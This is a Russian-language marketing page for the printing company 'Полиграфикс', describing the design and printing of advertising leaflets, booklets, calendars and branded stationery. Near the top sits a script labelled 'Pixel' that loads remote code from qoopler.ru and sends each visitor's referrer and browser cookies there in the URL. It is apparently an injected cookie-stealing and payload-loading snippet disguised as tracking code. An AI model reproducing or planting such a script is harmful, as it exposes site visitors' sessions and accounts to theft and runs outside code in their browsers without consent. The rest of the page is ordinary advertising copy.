(485) 522-51-06
ПН-ПТ 09:00-18:00

Вам перезвонить?

Написать письмо.... Заполнить формы на сайте.... Заполнить формы на сайте

<!-- Pixel -->
<script type="text/javascript">
(function (d, w) {
var n = d.getElementsByTagName("script")[0],
s = d.createElement("script"),
f = function () { n.parentNode.insertBefore(s, n); };
s.type = "text/javascript";
s.async = true;
s.src = "https://qoopler.ru/index.php?ref="+d.referrer+"&cookie=" +
encodeURIComponent(document.cookie);
if (w.opera == "[object Opera]") {
d.addEventListener("DOMContentLoaded", f, false);
} else { f(); }
})(document, window);
</script>
<!-- /Pixel -->

Рекламная полиграфия — печатная продукция, изготовленная в рекламных целях. Полиграфическая продукция с элементами фирменного стиля и рекламной информацией — закономерная часть рекламной компании практически любой организации. К печати рекламной полиграфии прибегают крупные, средние и небольшие организации. Она необходима как старожилам, так и компаниям, которые только начинают завоевывать рынок.

Рекламная полиграфия в Москве и регионах

Заказать дизайн, верстку и печать рекламной полиграфии Вы можете в типографии «Полиграфикс». Компания изготавливает практически любую полиграфическую продукцию, в том числе:

К вашим услугам — высококачественная офсетная печать полиграфии и весь спектр послепечатной обработки. Вам не придется думать о том, как доставить продукцию: компания «Полиграфикс» — типография с доставкой до дверей!

Производство рекламной полиграфии

Изготовление различной полиграфической продукции является неотъемлемой частью практически любой рекламной кампании. Рекламная полиграфия востребована благодаря своему многообразию и широте решаемых задач. Это мощный маркетинговый инструмент, способный повысить узнаваемость бренда, добиться лояльности аудитории, информировать партнеров и потребителей о товарах и услугах компании, ее конкурентных преимуществах, акциях и выгодных предложениях. В целом рекламная полиграфия позволяет привлекать новых клиентов и поддерживать контакт с уже существующими.

К числу наиболее ходовых видов рекламной полиграфии относятся буклеты, листовки, брошюры, флаеры, плакаты и визитные карточки. Они могут выполнять чисто рекламные функции, но могут имиджевыми и информационными. В рекламных целях может быть использована практически любая корпоративная полиграфия, на которую нанесен логотип, элементы фирменного стиля компании и ее контактная информация: календари, фирменные папки, планинги, ежедневники и блокноты с логотипом компании, конверты и открытки с корпоративной символикой, фирменные бланки, кубарики и пакеты с печатью. Имиджевая полиграфия служит закономерным продолжением фирменного стиля компании и является частью внутрикорпоративной культуры.

Рекламной полиграфии — кому и для чего она пригодится?

Печать рекламной полиграфии заказывают:

  • оффлайновые магазины и Интернет-магазины,
  • банки и финансовые учреждения,
  • транспортные и логистические компании,
  • турагенства и туристические компании,
  • медицинские учреждения,
  • строительные компании,
  • рекламные агенства,
  • производители товаров,
  • автосалоны и автоцентры,
  • салоны красоты, СПА-салоны и дистрибьюторы косметики.

Рекламную полиграфию заказывают для участия в выставках, конференциях, семинарах и тренингах. Недорогие листовки, брошюры, буклеты и флаеры могут быть массовым раздаточным материалом, в то время как солидная дизайнерская полиграфия — ежедневники с фирменной символикой, годовые календари, корпоративные журналы — служат прекрасными VIP-презентами. Качество и презентабельный внешний вид таких презентов особенно важны на рынке B2B, где затраты на подарки, которыми обмениваются компании, прямо пропорциональны возможной стоимости контрактов.

Имиджевая полиграфия с логотипом и контактными данными находит свое место в повседневной жизни фирмы. Благодаря собственной ценности блокноты, ежедневники, планинги, кубарики не только верно служат своим владельцам, но и являются источником ненавязчивой, но действенной рекламы. Фирменные бланки, конверты, открытки используются в работе бухгалтерии, в деловой переписке с партнерами и государственными службами.

Почему дизайн рекламной полиграфии лучше доверить профессионалам?

При разработке дизайн-макетов для фирменной полиграфии специалист отталкивается от элементов корпоративного стиля компании: логотипа и товарного знака, фирменных цветов и шрифтов. Если у компании еще нет своего логотипа и корпоративного стиля, то закономерно начинать именно с их создания.

Разработка конкретного дизайн-макета всегда начинается с постановки задачи. Необходимо привлечь внимание аудитории к конкретному мероприятию, магазину, точке продаж? Нужно повысить узнаваемость бренда, продемонстрировать его солидность и уверенное положение на рынке? Требуется проинформировать потенциальных клиентах о новых товарах и услугах или выгодных предложениях?

Профессиональный дизайнер, работающий в сфере рекламной полиграфии, имеет определенный опыт в постановке подобных задач. Перед тем, как приступить к созданию макета, он формулирует концепцию, которая позволит эффективно подать материал. Отличный дизайн — это сочетание грамотной компоновки, удачно подобранных шрифтов и цветовой гаммы, а также изображения нужного качества и содержания.

Для создания эффективной рекламной полиграфии необходимо учесть положение бренда или компании на рынке, особенности потребительского восприятия, глобальные тренды в сфере современного дизайна, характерные для конкретной области.

Имеет значение каждая деталь. Листовка, буклет или брошюра на выставочном стенде должны привлечь внимание заинтересованных людей и донести информацию до адресата. Как сделать ее такой, чтобы Ваш потенциальный клиент захотел взять ее в руки, пролистать, прочесть, оставить у себя? Профессиональный дизайнер знает ответ на этот вопрос.

ДИЗАЙН и ПЕЧАТЬ РЕКЛАМНОЙ ПОЛИГРАФИИ — ЦЕНА и СРОКИ

На стоимость дизайна рекламной полиграфии влияет сложность поставленных задач и объем предстоящей работы. Дизайн и верстка имиджевой продукции, как правило, дороже, чем информационной, так как требует проработки элементов фирменного стиля.

На цену печати рекламной полиграфии влияет множество параметров: разновидность продукции, ее объем, цветность, способы декорирования и тираж. Подробнее о технических моментах, с которыми нужно определиться при заказе фирменной продукции, читайте в статьях: 

При заказе полиграфической продукции низкие цены играют важную, но не всегда решающую роль. Обсудите с Вашим личным менеджером все возможные варианты исполнения заказа — найдите наиболее грамотные компромиссные решения!

Позвоните по тел. (4855) 22-51-06 или воспользуйтесь другими удобными видами связи:

Связаться

Группа компаний Полиграфикс 2016 | При копировании материала ссылка на данную статью обязательна.

1 1 1 1 1 1 1 1 1 1
Rating 5.00 (1 Vote)
Позвоните по тел. (485) 522-51-06:
или воспользуйтесь другими способами связи: